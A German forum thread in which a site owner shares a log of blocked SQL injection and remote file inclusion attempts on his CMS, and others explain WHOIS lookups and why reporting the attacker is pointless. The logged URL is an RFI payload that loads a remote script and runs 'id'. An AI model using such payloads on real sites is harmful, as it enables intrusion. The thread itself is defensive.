Wiederholte SQL Injection Versuche - Anzeige möglich?

keksausmainz

keksausmainz

Registered User
Hallo zusammen,

ich habe schon einmal durch eine SQL Injection Stress gehabt und bin seitdem mit einigen (eigens dafür erstellten) Scripts, die ich automatisch durch die PHP-Einstellung prepend_file einbinde, geschützt.

Bei jeder Attacke lasse ich mir dann eine E-Mail schicken mit IP, Query String und Timestamp. In wie weit das mit der IP-Adresse rechtlich einwandfrei ist (weil man diese ja aktuellerweise nicht mehr speichern darf) ist mir in dem Fall schnuppe.

Jedenfalls erhalte ich pro Tag ca. 4-8 Mails vom Script. Jemand versucht andauernd SQL Injections und fremden Code einzuschmuggeln, was durch das Script immer verhindert wird.
Das sieht dann meist so aus:

Methode: Externer Code ("http://" in "path" erkannt)
Timestamp: 1192271763
IP: 189.13.180.128 (X-Forwarded: -)
URL: www.domain.com/cms/index.php?core=loinpa&path=http://www.domain.co.kr/tool25.txt?&cmd=id

---Ende des Berichts---
Click to expand...

Mich nervt das nicht nur, es ärgert mich auch tierisch. :mad: Die IP Adresse ist offensichtlich gefälscht, da sie laut Welcome to RIPE.NET nicht vergeben ist.

Wäre eine Anzeige gegen Unbekannt sinnvoll bzw. würde das überhaupt was bringen? Der Code, der eingeschleust werden soll, kommt vom Domainnamen her mal aus Deutschland, dann aus China, dann mal wieder aus Russland, ich schätze es handelt sich da auch um gehackte Seiten, deren Beitreiber das noch nicht gemerkt haben...

Gruß,
Max
 
Last edited by a moderator:
keksausmainz said:
Jedenfalls erhalte ich pro Tag ca. 4-8 Mails vom Script.
Click to expand...
4-8 Mails pro Tag? Und du machst dir darüber Sorgen?

keksausmainz said:
Mich nervt das nicht nur, es ärgert mich auch tierisch. :mad: Die IP Adresse ist offensichtlich gefälscht, da sie laut Welcome to RIPE.NET nicht vergeben ist.
Click to expand...
Man sollte auch den richtigen WHOIS-Server abfragen: http://lacnic.net/cgi-bin/lacnic/whois?query=189.13.180.128

keksausmainz said:
Wäre eine Anzeige gegen Unbekannt sinnvoll bzw. würde das überhaupt was bringen?
Click to expand...
In diesem Fall nein. Dir ist kein Schaden entstanden und der Angreifer sitzt weit außerhalb der zuständigen Jurisdiktion in Brasilien. IANAL, YMMV.
 
Okay, danke ;)

Das RIPE natürlich nur für EU gilt, hätt ich mir denken können, deswegen ja auch das E in RIPE :D

4-8 Mails pro Tag? Und du machst dir darüber Sorgen?
Click to expand...
Ist das echt normal? Es gab Zeiten, da hab ich gar keine bekommen, das ist erst in letzter Zeit. Oder hatte ich bisher nur "Glück"? :confused:
 
Mit steigendem Alter und Bekanntheit einer Domain erfolgen auch mehr Angriffe.
Das ist einfach normal und kann entsprechendes "Hintergrundrauschen" sein.

Du mußt es von der positiven Seite sehen:
Deine Domain hat einen gewissen Level erreicht. :D

huschi.
 
You must log in or register to reply here.
Back
Top